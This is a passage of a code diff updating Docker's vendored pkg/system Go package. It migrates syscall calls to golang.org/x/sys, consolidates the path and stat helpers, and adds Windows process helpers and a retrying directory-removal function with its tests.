--- a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go +++ 
b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!windows,!solaris +// +build !linux,!windows -package system +package system // import "github.com/docker/docker/pkg/system" // ReadMemInfo is not supported on platforms other than linux and windows. func ReadMemInfo() (*MemInfo, error) { diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go index 883944a4c5..6ed93f2fe2 100644 --- a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "unsafe" diff --git a/vendor/github.com/docker/docker/pkg/system/mknod.go b/vendor/github.com/docker/docker/pkg/system/mknod.go index 73958182b4..b132482e03 100644 --- a/vendor/github.com/docker/docker/pkg/system/mknod.go +++ b/vendor/github.com/docker/docker/pkg/system/mknod.go @@ -1,15 +1,15 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( - "syscall" + "golang.org/x/sys/unix" ) // Mknod creates a filesystem node (file, device special file or named pipe) named path // with attributes specified by mode and dev. func Mknod(path string, mode uint32, dev int) error { - return syscall.Mknod(path, mode, dev) + return unix.Mknod(path, mode, dev) } // Mkdev is used to build the value of linux devices (in /dev/) which specifies major @@ -18,5 +18,5 @@ func Mknod(path string, mode uint32, dev int) error { // They are, from low to high: the lower 8 bits of the minor, then 12 bits of the major, // then the top 12 bits of the minor. 
func Mkdev(major int64, minor int64) uint32 { - return uint32(((minor & 0xfff00) << 12) | ((major & 0xfff) << 8) | (minor & 0xff)) + return uint32(unix.Mkdev(uint32(major), uint32(minor))) } diff --git a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go index 2e863c0215..ec89d7a15e 100644 --- a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" // Mknod is not implemented on Windows. func Mknod(path string, mode uint32, dev int) error { diff --git a/vendor/github.com/docker/docker/pkg/system/path.go b/vendor/github.com/docker/docker/pkg/system/path.go new file mode 100644 index 0000000000..a3d957afab --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/path.go @@ -0,0 +1,60 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "fmt" + "path/filepath" + "runtime" + "strings" + + "github.com/containerd/continuity/pathdriver" +) + +const defaultUnixPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + +// DefaultPathEnv is unix style list of directories to search for +// executables. Each directory is separated from the next by a colon +// ':' character . +func DefaultPathEnv(os string) string { + if runtime.GOOS == "windows" { + if os != runtime.GOOS { + return defaultUnixPathEnv + } + // Deliberately empty on Windows containers on Windows as the default path will be set by + // the container. Docker has no context of what the default path should be. + return "" + } + return defaultUnixPathEnv + +} + +// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter, +// is the system drive. +// On Linux: this is a no-op. 
+// On Windows: this does the following> +// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path. +// This is used, for example, when validating a user provided path in docker cp. +// If a drive letter is supplied, it must be the system drive. The drive letter +// is always removed. Also, it translates it to OS semantics (IOW / to \). We +// need the path in this syntax so that it can ultimately be concatenated with +// a Windows long-path which doesn't support drive-letters. Examples: +// C: --> Fail +// C:\ --> \ +// a --> a +// /a --> \a +// d:\ --> Fail +func CheckSystemDriveAndRemoveDriveLetter(path string, driver pathdriver.PathDriver) (string, error) { + if runtime.GOOS != "windows" || LCOWSupported() { + return path, nil + } + + if len(path) == 2 && string(path[1]) == ":" { + return "", fmt.Errorf("No relative path specified in %q", path) + } + if !driver.IsAbs(path) || len(path) < 2 { + return filepath.FromSlash(path), nil + } + if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") { + return "", fmt.Errorf("The specified path is not on the system drive (C:)") + } + return filepath.FromSlash(path[2:]), nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/path_unix.go b/vendor/github.com/docker/docker/pkg/system/path_unix.go deleted file mode 100644 index c607c4db09..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/path_unix.go +++ /dev/null @@ -1,14 +0,0 @@ -// +build !windows - -package system - -// DefaultPathEnv is unix style list of directories to search for -// executables. Each directory is separated from the next by a colon -// ':' character . -const DefaultPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" - -// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter, -// is the system drive. This is a no-op on Linux. 
-func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) { - return path, nil -} diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows.go b/vendor/github.com/docker/docker/pkg/system/path_windows.go deleted file mode 100644 index cbfe2c1576..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/path_windows.go +++ /dev/null @@ -1,37 +0,0 @@ -// +build windows - -package system - -import ( - "fmt" - "path/filepath" - "strings" -) - -// DefaultPathEnv is deliberately empty on Windows as the default path will be set by -// the container. Docker has no context of what the default path should be. -const DefaultPathEnv = "" - -// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path. -// This is used, for example, when validating a user provided path in docker cp. -// If a drive letter is supplied, it must be the system drive. The drive letter -// is always removed. Also, it translates it to OS semantics (IOW / to \). We -// need the path in this syntax so that it can ultimately be contatenated with -// a Windows long-path which doesn't support drive-letters. 
Examples: -// C: --> Fail -// C:\ --> \ -// a --> a -// /a --> \a -// d:\ --> Fail -func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) { - if len(path) == 2 && string(path[1]) == ":" { - return "", fmt.Errorf("No relative path specified in %q", path) - } - if !filepath.IsAbs(path) || len(path) < 2 { - return filepath.FromSlash(path), nil - } - if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") { - return "", fmt.Errorf("The specified path is not on the system drive (C:)") - } - return filepath.FromSlash(path[2:]), nil -} diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go index eccb26aaea..974707eb71 100644 --- a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go +++ b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go @@ -1,19 +1,24 @@ // +build windows -package system +package system // import "github.com/docker/docker/pkg/system" -import "testing" +import ( + "testing" + + "github.com/containerd/continuity/pathdriver" +) // TestCheckSystemDriveAndRemoveDriveLetter tests CheckSystemDriveAndRemoveDriveLetter func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { // Fails if not C drive. 
- path, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`) + _, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`, pathdriver.LocalPathDriver) if err == nil || (err != nil && err.Error() != "The specified path is not on the system drive (C:)") { t.Fatalf("Expected error for d:") } // Single character is unchanged - if path, err = CheckSystemDriveAndRemoveDriveLetter("z"); err != nil { + var path string + if path, err = CheckSystemDriveAndRemoveDriveLetter("z", pathdriver.LocalPathDriver); err != nil { t.Fatalf("Single character should pass") } if path != "z" { @@ -21,7 +26,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Two characters without colon is unchanged - if path, err = CheckSystemDriveAndRemoveDriveLetter("AB"); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter("AB", pathdriver.LocalPathDriver); err != nil { t.Fatalf("2 characters without colon should pass") } if path != "AB" { @@ -29,7 +34,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Abs path without drive letter - if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`, pathdriver.LocalPathDriver); err != nil { t.Fatalf("abs path no drive letter should pass") } if path != `\l` { @@ -37,7 +42,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Abs path without drive letter, linux style - if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`, pathdriver.LocalPathDriver); err != nil { t.Fatalf("abs path no drive letter linux style should pass") } if path != `\l` { @@ -45,7 +50,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Drive-colon should be stripped - if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`, pathdriver.LocalPathDriver); err != nil { t.Fatalf("An 
absolute path should pass") } if path != `\` { @@ -53,7 +58,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Verify with a linux-style path - if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`); err != nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`, pathdriver.LocalPathDriver); err != nil { t.Fatalf("An absolute path should pass") } if path != `\` { @@ -61,7 +66,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Failure on c: - if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`); err == nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`, pathdriver.LocalPathDriver); err == nil { t.Fatalf("c: should fail") } if err.Error() != `No relative path specified in "c:"` { @@ -69,7 +74,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) { } // Failure on d: - if path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`); err == nil { + if path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`, pathdriver.LocalPathDriver); err == nil { t.Fatalf("c: should fail") } if err.Error() != `No relative path specified in "d:"` { diff --git a/vendor/github.com/docker/docker/utils/process_unix.go b/vendor/github.com/docker/docker/pkg/system/process_unix.go similarity index 50% rename from vendor/github.com/docker/docker/utils/process_unix.go rename to vendor/github.com/docker/docker/pkg/system/process_unix.go index fc0b1c8b74..0195a891b2 100644 --- a/vendor/github.com/docker/docker/utils/process_unix.go +++ b/vendor/github.com/docker/docker/pkg/system/process_unix.go @@ -1,15 +1,17 @@ -// +build linux freebsd solaris +// +build linux freebsd darwin -package utils +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" + + "golang.org/x/sys/unix" ) // IsProcessAlive returns true if process with a given pid is running. 
func IsProcessAlive(pid int) bool { - err := syscall.Kill(pid, syscall.Signal(0)) - if err == nil || err == syscall.EPERM { + err := unix.Kill(pid, syscall.Signal(0)) + if err == nil || err == unix.EPERM { return true } @@ -18,5 +20,5 @@ func IsProcessAlive(pid int) bool { // KillProcess force-stops a process. func KillProcess(pid int) { - syscall.Kill(pid, syscall.SIGKILL) + unix.Kill(pid, unix.SIGKILL) } diff --git a/vendor/github.com/docker/docker/pkg/system/process_windows.go b/vendor/github.com/docker/docker/pkg/system/process_windows.go new file mode 100644 index 0000000000..4e70c97b18 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/process_windows.go @@ -0,0 +1,18 @@ +package system // import "github.com/docker/docker/pkg/system" + +import "os" + +// IsProcessAlive returns true if process with a given pid is running. +func IsProcessAlive(pid int) bool { + _, err := os.FindProcess(pid) + + return err == nil +} + +// KillProcess force-stops a process. +func KillProcess(pid int) { + p, err := os.FindProcess(pid) + if err == nil { + p.Kill() + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/rm.go b/vendor/github.com/docker/docker/pkg/system/rm.go new file mode 100644 index 0000000000..02e4d26221 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/rm.go @@ -0,0 +1,80 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "os" + "syscall" + "time" + + "github.com/docker/docker/pkg/mount" + "github.com/pkg/errors" +) + +// EnsureRemoveAll wraps `os.RemoveAll` to check for specific errors that can +// often be remedied. +// Only use `EnsureRemoveAll` if you really want to make every effort to remove +// a directory. +// +// Because of the way `os.Remove` (and by extension `os.RemoveAll`) works, there +// can be a race between reading directory entries and then actually attempting +// to remove everything in the directory. 
+// These types of errors do not need to be returned since it's ok for the dir to +// be gone we can just retry the remove operation. +// +// This should not return a `os.ErrNotExist` kind of error under any circumstances +func EnsureRemoveAll(dir string) error { + notExistErr := make(map[string]bool) + + // track retries + exitOnErr := make(map[string]int) + maxRetry := 50 + + // Attempt to unmount anything beneath this dir first + mount.RecursiveUnmount(dir) + + for { + err := os.RemoveAll(dir) + if err == nil { + return err + } + + pe, ok := err.(*os.PathError) + if !ok { + return err + } + + if os.IsNotExist(err) { + if notExistErr[pe.Path] { + return err + } + notExistErr[pe.Path] = true + + // There is a race where some subdir can be removed but after the parent + // dir entries have been read. + // So the path could be from `os.Remove(subdir)` + // If the reported non-existent path is not the passed in `dir` we + // should just retry, but otherwise return with no error. + if pe.Path == dir { + return nil + } + continue + } + + if pe.Err != syscall.EBUSY { + return err + } + + if mounted, _ := mount.Mounted(pe.Path); mounted { + if e := mount.Unmount(pe.Path); e != nil { + if mounted, _ := mount.Mounted(pe.Path); mounted { + return errors.Wrapf(e, "error while removing %s", dir) + } + } + } + + if exitOnErr[pe.Path] == maxRetry { + return err + } + exitOnErr[pe.Path]++ + time.Sleep(100 * time.Millisecond) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/rm_test.go b/vendor/github.com/docker/docker/pkg/system/rm_test.go new file mode 100644 index 0000000000..0448aac619 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/rm_test.go @@ -0,0 +1,84 @@ +package system // import "github.com/docker/docker/pkg/system" + +import ( + "io/ioutil" + "os" + "path/filepath" + "runtime" + "testing" + "time" + + "github.com/docker/docker/pkg/mount" + "gotest.tools/skip" +) + +func TestEnsureRemoveAllNotExist(t *testing.T) { + // should never return an 
error for a non-existent path + if err := EnsureRemoveAll("/non/existent/path"); err != nil { + t.Fatal(err) + } +} + +func TestEnsureRemoveAllWithDir(t *testing.T) { + dir, err := ioutil.TempDir("", "test-ensure-removeall-with-dir") + if err != nil { + t.Fatal(err) + } + if err := EnsureRemoveAll(dir); err != nil { + t.Fatal(err) + } +} + +func TestEnsureRemoveAllWithFile(t *testing.T) { + tmp, err := ioutil.TempFile("", "test-ensure-removeall-with-dir") + if err != nil { + t.Fatal(err) + } + tmp.Close() + if err := EnsureRemoveAll(tmp.Name()); err != nil { + t.Fatal(err) + } +} + +func TestEnsureRemoveAllWithMount(t *testing.T) { + skip.If(t, runtime.GOOS == "windows", "mount not supported on Windows") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + + dir1, err := ioutil.TempDir("", "test-ensure-removeall-with-dir1") + if err != nil { + t.Fatal(err) + } + dir2, err := ioutil.TempDir("", "test-ensure-removeall-with-dir2") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dir2) + + bindDir := filepath.Join(dir1, "bind") + if err := os.MkdirAll(bindDir, 0755); err != nil { + t.Fatal(err) + } + + if err := mount.Mount(dir2, bindDir, "none", "bind"); err != nil { + t.Fatal(err) + } + + done := make(chan struct{}) + go func() { + err = EnsureRemoveAll(dir1) + close(done) + }() + + select { + case <-done: + if err != nil { + t.Fatal(err) + } + case <-time.After(5 * time.Second): + t.Fatal("timeout waiting for EnsureRemoveAll to finish") + } + + if _, err := os.Stat(dir1); !os.IsNotExist(err) { + t.Fatalf("expected %q to not exist", dir1) + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go index f0742f59e5..c1c0ee9f38 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go @@ -1,10 +1,8 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - 
"syscall" -) +import "syscall" -// fromStatT creates a system.StatT type from a syscall.Stat_t type +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { return &StatT{size: s.Size, mode: uint32(s.Mode), @@ -13,20 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) { rdev: uint64(s.Rdev), mtim: s.Mtimespec}, nil } - -// FromStatT loads a system.StatT from a syscall.Stat_t. -func FromStatT(s *syscall.Stat_t) (*StatT, error) { - return fromStatT(s) -} - -// Stat takes a path to a file and returns -// a system.StatT type pertaining to that file. -// -// Throws an error if the file does not exist -func Stat(path string) (*StatT, error) { - s := &syscall.Stat_t{} - if err := syscall.Stat(path, s); err != nil { - return nil, err - } - return fromStatT(s) -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go index d0fb6f1519..c1c0ee9f38 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go @@ -1,8 +1,6 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" -) +import "syscall" // fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { @@ -13,15 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) { rdev: uint64(s.Rdev), mtim: s.Mtimespec}, nil } - -// Stat takes a path to a file and returns -// a system.Stat_t type pertaining to that file. 
-// -// Throws an error if the file does not exist -func Stat(path string) (*StatT, error) { - s := &syscall.Stat_t{} - if err := syscall.Stat(path, s); err != nil { - return nil, err - } - return fromStatT(s) -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_linux.go b/vendor/github.com/docker/docker/pkg/system/stat_linux.go index 8b1eded138..98c9eb18d1 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_linux.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_linux.go @@ -1,8 +1,6 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" -) +import "syscall" // fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { @@ -14,20 +12,8 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) { mtim: s.Mtim}, nil } -// FromStatT exists only on linux, and loads a system.StatT from a -// syscal.Stat_t. +// FromStatT converts a syscall.Stat_t type to a system.Stat_t type +// This is exposed on Linux as pkg/archive/changes uses it. func FromStatT(s *syscall.Stat_t) (*StatT, error) { return fromStatT(s) } - -// Stat takes a path to a file and returns -// a system.StatT type pertaining to that file. 
-// -// Throws an error if the file does not exist -func Stat(path string) (*StatT, error) { - s := &syscall.Stat_t{} - if err := syscall.Stat(path, s); err != nil { - return nil, err - } - return fromStatT(s) -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go index 3c3b71fb21..756b92d1e6 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go @@ -1,10 +1,8 @@ -package system +package system // import "github.com/docker/docker/pkg/system" -import ( - "syscall" -) +import "syscall" -// fromStatT creates a system.StatT type from a syscall.Stat_t type +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { return &StatT{size: s.Size, mode: uint32(s.Mode), diff --git a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go index 0216985a25..756b92d1e6 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go @@ -1,12 +1,8 @@ -// +build solaris +package system // import "github.com/docker/docker/pkg/system" -package system +import "syscall" -import ( - "syscall" -) - -// fromStatT creates a system.StatT type from a syscall.Stat_t type +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type func fromStatT(s *syscall.Stat_t) (*StatT, error) { return &StatT{size: s.Size, mode: uint32(s.Mode), @@ -15,20 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) { rdev: uint64(s.Rdev), mtim: s.Mtim}, nil } - -// FromStatT loads a system.StatT from a syscal.Stat_t. -func FromStatT(s *syscall.Stat_t) (*StatT, error) { - return fromStatT(s) -} - -// Stat takes a path to a file and returns -// a system.StatT type pertaining to that file. 
-// -// Throws an error if the file does not exist -func Stat(path string) (*StatT, error) { - s := &syscall.Stat_t{} - if err := syscall.Stat(path, s); err != nil { - return nil, err - } - return fromStatT(s) -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat.go b/vendor/github.com/docker/docker/pkg/system/stat_unix.go similarity index 63% rename from vendor/github.com/docker/docker/pkg/system/stat.go rename to vendor/github.com/docker/docker/pkg/system/stat_unix.go index 087034c5ec..3d7e2ebbef 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_unix.go @@ -1,6 +1,6 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( "syscall" @@ -47,7 +47,19 @@ func (s StatT) Mtim() syscall.Timespec { return s.mtim } -// GetLastModification returns file's last modification time. -func (s StatT) GetLastModification() syscall.Timespec { - return s.Mtim() +// IsDir reports whether s describes a directory. +func (s StatT) IsDir() bool { + return s.mode&syscall.S_IFDIR != 0 +} + +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. 
+// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) } diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go index dee8d30a19..44e048f2a7 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go @@ -1,11 +1,13 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" "syscall" "testing" + + "gotest.tools/assert" ) // TestFromStatT tests fromStatT for a tempfile @@ -15,11 +17,10 @@ func TestFromStatT(t *testing.T) { stat := &syscall.Stat_t{} err := syscall.Lstat(file, stat) + assert.NilError(t, err) s, err := fromStatT(stat) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if stat.Mode != s.Mode() { t.Fatal("got invalid mode") diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go deleted file mode 100644 index 5d85f523cf..0000000000 --- a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go +++ /dev/null @@ -1,17 +0,0 @@ -// +build !linux,!windows,!freebsd,!solaris,!openbsd,!darwin - -package system - -import ( - "syscall" -) - -// fromStatT creates a system.StatT type from a syscall.Stat_t type -func fromStatT(s *syscall.Stat_t) (*StatT, error) { - return &StatT{size: s.Size, - mode: uint32(s.Mode), - uid: s.Uid, - gid: s.Gid, - rdev: uint64(s.Rdev), - mtim: s.Mtimespec}, nil -} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_windows.go b/vendor/github.com/docker/docker/pkg/system/stat_windows.go index 39490c625c..b2456cb887 100644 --- a/vendor/github.com/docker/docker/pkg/system/stat_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/stat_windows.go @@ 
-1,6 +1,4 @@ -// +build windows - -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" @@ -8,18 +6,11 @@ import ( ) // StatT type contains status of a file. It contains metadata -// like name, permission, size, etc about a file. +// like permission, size, etc about a file. type StatT struct { - name string - size int64 - mode os.FileMode - modTime time.Time - isDir bool -} - -// Name returns file's name. -func (s StatT) Name() string { - return s.name + mode os.FileMode + size int64 + mtim time.Time } // Size returns file's size. @@ -29,15 +20,30 @@ func (s StatT) Size() int64 { // Mode returns file's permission mode. func (s StatT) Mode() os.FileMode { - return s.mode + return os.FileMode(s.mode) +} + +// Mtim returns file's last modification time. +func (s StatT) Mtim() time.Time { + return time.Time(s.mtim) } -// ModTime returns file's last modification time. -func (s StatT) ModTime() time.Time { - return s.modTime +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. +// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + fi, err := os.Stat(path) + if err != nil { + return nil, err + } + return fromStatT(&fi) } -// IsDir returns whether file is actually a directory. 
-func (s StatT) IsDir() bool { - return s.isDir +// fromStatT converts a os.FileInfo type to a system.StatT type +func fromStatT(fi *os.FileInfo) (*StatT, error) { + return &StatT{ + size: (*fi).Size(), + mode: (*fi).Mode(), + mtim: (*fi).ModTime()}, nil } diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go index 3ae9128468..919a412a7b 100644 --- a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go +++ b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go @@ -1,13 +1,13 @@ // +build linux freebsd -package system +package system // import "github.com/docker/docker/pkg/system" -import "syscall" +import "golang.org/x/sys/unix" // Unmount is a platform-specific helper function to call // the unmount syscall. func Unmount(dest string) error { - return syscall.Unmount(dest, 0) + return unix.Unmount(dest, 0) } // CommandLineToArgv should not be used on Unix. diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go index 1f311874f4..ee7e0256f3 100644 --- a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go +++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go @@ -1,15 +1,17 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( - "syscall" + "fmt" "unsafe" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/windows" ) var ( - ntuserApiset = syscall.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0") - procGetVersionExW = modkernel32.NewProc("GetVersionExW") + ntuserApiset = windows.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0") + procGetVersionExW = modkernel32.NewProc("GetVersionExW") + procGetProductInfo = modkernel32.NewProc("GetProductInfo") ) // OSVersion is a wrapper for Windows version information @@ -41,7 +43,7 @@ type osVersionInfoEx struct { func GetOSVersion() OSVersion { var err error osv := OSVersion{} 
- osv.Version, err = syscall.GetVersion() + osv.Version, err = windows.GetVersion() if err != nil { // GetVersion never fails. panic(err) @@ -52,6 +54,10 @@ func GetOSVersion() OSVersion { return osv } +func (osv OSVersion) ToString() string { + return fmt.Sprintf("%d.%d.%d", osv.MajorVersion, osv.MinorVersion, osv.Build) +} + // IsWindowsClient returns true if the SKU is client // @engine maintainers - this function should not be removed or modified as it // is used to enforce licensing restrictions on Windows. @@ -66,6 +72,22 @@ func IsWindowsClient() bool { return osviex.ProductType == verNTWorkstation } +// IsIoTCore returns true if the currently running image is based off of +// Windows 10 IoT Core. +// @engine maintainers - this function should not be removed or modified as it +// is used to enforce licensing restrictions on Windows. +func IsIoTCore() bool { + var returnedProductType uint32 + r1, _, err := procGetProductInfo.Call(6, 1, 0, 0, uintptr(unsafe.Pointer(&returnedProductType))) + if r1 == 0 { + logrus.Warnf("GetProductInfo failed - assuming this is not IoT: %v", err) + return false + } + const productIoTUAP = 0x0000007B + const productIoTUAPCommercial = 0x00000083 + return returnedProductType == productIoTUAP || returnedProductType == productIoTUAPCommercial +} + // Unmount is a platform-specific helper function to call // the unmount syscall. 
Not supported on Windows func Unmount(dest string) error { @@ -76,20 +98,20 @@ func Unmount(dest string) error { func CommandLineToArgv(commandLine string) ([]string, error) { var argc int32 - argsPtr, err := syscall.UTF16PtrFromString(commandLine) + argsPtr, err := windows.UTF16PtrFromString(commandLine) if err != nil { return nil, err } - argv, err := syscall.CommandLineToArgv(argsPtr, &argc) + argv, err := windows.CommandLineToArgv(argsPtr, &argc) if err != nil { return nil, err } - defer syscall.LocalFree(syscall.Handle(uintptr(unsafe.Pointer(argv)))) + defer windows.LocalFree(windows.Handle(uintptr(unsafe.Pointer(argv)))) newArgs := make([]string, argc) for i, v := range (*argv)[:argc] { - newArgs[i] = string(syscall.UTF16ToString((*v)[:])) + newArgs[i] = string(windows.UTF16ToString((*v)[:])) } return newArgs, nil diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go index 4886b2b9b4..8e78ba6285 100644 --- a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go +++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go @@ -1,4 +1,4 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import "testing" diff --git a/vendor/github.com/docker/docker/pkg/system/umask.go b/vendor/github.com/docker/docker/pkg/system/umask.go index 3d0146b01a..9912a2babb 100644 --- a/vendor/github.com/docker/docker/pkg/system/umask.go +++ b/vendor/github.com/docker/docker/pkg/system/umask.go @@ -1,13 +1,13 @@ // +build !windows -package system +package system // import "github.com/docker/docker/pkg/system" import ( - "syscall" + "golang.org/x/sys/unix" ) // Umask sets current process's file mode creation mask to newmask // and returns oldmask. 
